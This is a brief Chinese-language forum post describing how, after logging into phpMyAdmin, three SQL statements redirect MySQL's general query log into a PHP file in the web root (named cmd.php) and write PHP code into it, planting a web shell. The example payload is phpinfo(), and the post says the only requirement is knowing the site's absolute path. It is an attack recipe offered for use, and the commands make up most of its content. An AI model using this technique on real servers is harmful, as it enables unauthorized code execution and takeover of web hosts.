libo 发表于 2019-11-5 12:58:03

利用phpmyadmin轻松那些shell

当我们登入phpmyadmin后,我们可以执行下面的三条SQL语句,轻松拿到shell
SET GLOBAL GENERAL_log='on';
SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';
SELECT '<?php phpinfo(); ?>';


需要注意的是,这种方法的的唯一缺陷就是要知道网站的唯一路径。

执行





页: [1]
查看完整版本: 利用phpmyadmin轻松那些shell